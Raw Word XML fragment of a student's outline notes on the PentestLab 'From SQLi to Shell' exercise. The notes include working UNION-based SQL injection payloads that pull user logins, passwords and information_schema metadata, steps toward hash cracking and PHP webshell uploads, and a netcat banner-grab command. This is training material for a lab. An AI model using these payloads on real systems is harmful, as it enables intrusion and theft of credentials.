          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to put together information from two requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493784F1" w14:textId="6CEF6C5C" w:rsidR="002E68B9" w:rsidRDefault="002E68B9" w:rsidP="002E68B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT * FROM &lt;table&gt; WHERE id=3 UNION SELECT . . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D09D2" w14:textId="360FB01C" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can be used as an SQLi payload by manipulating end of the query and retrieving information from other tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3EFBA" w14:textId="0A483174" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SELECT id,name,price FROM &lt;articles WHERE id=3 UNION SELECT id,login,password FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DF859" w14:textId="3F052DAE" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploiting SQL Injections with UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B65064" w14:textId="1416E126" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first, find the number of columns to perform the UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC83370" w14:textId="2C363E5D" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then find what columns are echoed in the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380343DC" w14:textId="54CC18D2" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then retrieve information from the database meta-tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E113CB" w14:textId="0B44366D" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lastly, retrieve information from other tables/databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8B4B6" w14:textId="4238AF76" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two methods for step one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0168A" w14:textId="676E0181" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using UNION SELECT and increase the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CB13F" w14:textId="20F6B18A" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if number of columns returned by two queries are different, database throws an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305B5BA" w14:textId="58133B17" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>the used SELECT statements have a different number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEBB91" w14:textId="6916DF67" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8558C5" w14:textId="3EEF5E79" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT id,name,price FROM articles where id=1 UNION SELECT 1 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00080D0C" w14:textId="03128AC0" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79619B26" w14:textId="5A6AD651" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wont throw an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD185" w14:textId="327B5D1F" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use of numbers is MySQL specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B03E5C" w14:textId="440AF441" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>others use null,null,null</w:t>
      </w:r>
      <w:r w:rsidR="00750F3A">
        <w:t xml:space="preserve"> FROM dual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B486FB" w14:textId="73492B31" w:rsidR="007A5A21" w:rsidRDefault="007A5A21" w:rsidP="007A5A21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using ORDER BY statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590ADEE0" w14:textId="5D237F0F" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT firstname,lastname,age,groups FROM users ORDER BY 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE5A43" w14:textId="5B1762FE" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>request above returns the users sorted by the third column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D88C2" w14:textId="2E1ECC64" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this feature can be used to detect the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93D132" w14:textId="64AF2EA4" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if ORDER BY number is too big, exception is thrown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D3121" w14:textId="48AE09BC" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>faster method with large column numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B842D1" w14:textId="5B9B3DCC" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Retrieving Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E95B2" w14:textId="71A2B0B4" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961DD9C" w14:textId="22BE349C" w:rsidR="00750F3A" w:rsidRDefault="007A6E65" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00750F3A" w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C05E0F4" w14:textId="18342CF3" w:rsidR="00750F3A" w:rsidRDefault="007A6E65" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="00750F3A" w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B147EAE" w14:textId="30E0B8E5" w:rsidR="00750F3A" w:rsidRDefault="007A6E65" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidR="00750F3A" w:rsidRPr="006D4942">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="215E7F9E" w14:textId="293021C7" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00750F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>metadata can be retrieved from querying information_schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C8997" w14:textId="3C51C591" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT table_name FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28152AC3" w14:textId="30B1898E" w:rsidR="00750F3A" w:rsidRDefault="00750F3A" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT column_name FROM information_schema.columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6E6BA" w14:textId="5D5BC1CD" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42CA7">
        <w:t>the list of tables: 1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426B635" w14:textId="7F9BAAA1" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42CA7">
        <w:t>the list of columns: 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EDCC37" w14:textId="54E7D83B" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to find what column belongs to what table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F454B" w14:textId="79B5C5A8" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42CA7">
        <w:t>SELECT table_name,column_name FROM information_schema.columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CB2D8" w14:textId="76F38EC3" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Access to the Admin Pages and Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8C78C" w14:textId="78A6ED2A" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>crack password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E55BEB" w14:textId="5A7294B3" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>access to admin page and look for RCE opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF87DE" w14:textId="19CCB0AB" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>php scripts in file uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA24398" w14:textId="5CCA1BD9" w:rsidR="00E42CA7" w:rsidRDefault="00E42CA7" w:rsidP="00E42CA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>minimal webshells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B413A" w14:textId="59C63BF1" w:rsidR="00ED487B" w:rsidRDefault="00ED487B" w:rsidP="00ED487B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>From SQLi to Shell – PentestLab – Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F67F45" w14:textId="36CEFD54" w:rsidR="00ED487B" w:rsidRDefault="00ED487B" w:rsidP="00ED487B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD94D37" w14:textId="4E336BDA" w:rsidR="00ED487B" w:rsidRDefault="00ED487B" w:rsidP="00ED487B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Inspecting HTTP Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD7AAB" w14:textId="3BC594A0" w:rsidR="00ED487B" w:rsidRDefault="00ED487B" w:rsidP="00ED487B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use netcat or telnet to connect to web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E38AB4" w14:textId="768A967C" w:rsidR="00ED487B" w:rsidRDefault="00767C29" w:rsidP="00ED487B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00767C29">
        <w:t xml:space="preserve">% echo "HEAD / HTTP/1.1\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | netcat </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00767C29">
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00767C29">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC0131" w14:textId="21B0DCD1" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HEAD returns only banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914008A" w14:textId="6AD3730F" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: close tells server to close connection after processing request</w:t>
      </w:r>
    </w:p>
